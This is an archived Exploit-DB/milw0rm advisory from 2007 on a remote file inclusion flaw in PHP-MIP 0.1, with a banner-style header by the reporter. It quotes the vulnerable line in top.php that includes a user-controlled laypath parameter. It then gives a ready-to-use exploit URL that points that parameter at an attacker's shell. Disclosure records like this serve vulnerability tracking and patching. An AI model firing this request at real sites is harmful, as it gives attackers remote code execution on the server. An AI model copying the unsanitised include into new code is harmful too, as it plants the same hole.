PHP-MIP 0.1 top.php laypath Remote File Include Vulnerability

2007-02-25T00:00:00
ID EDB-ID:3374
Type exploitdb
Reporter GoLd_M
Modified 2007-02-25T00:00:00

Description

PHP-MIP 0.1 (top.php laypath) Remote File Include Vulnerability. CVE-2007-1104. Webapps exploit for php platform

                                        
                                            *********************************************************************
**********************************************************************
PHP Module Implementation(top.php laypath)Remote File Include Vul   ^
**********************************************************************
**********************************************************************
Downlaoad S : http://sourceforge.net/projects/phpmip/               ^
**********************************************************************
**********************************************************************
Author: GolD_M = [Mahmood_ali]  &&  Contact: HackEr_@W.Cn           ^
**********************************************************************
**********************************************************************
In:  /[path]/top.php                                                ^
**********************************************************************
**********************************************************************
Vulnerable Code:                                                    ^
**********************************************************************
**********************************************************************
include("$laypath/body.php");    Line : 23                          ^
**********************************************************************
**********************************************************************
Exploit:                                                            ^
**********************************************************************
**********************************************************************
http://Victim.Com/top.php?laypath=[Shell]                           ^
**********************************************************************
**********************************************************************

# milw0rm.com [2007-02-25]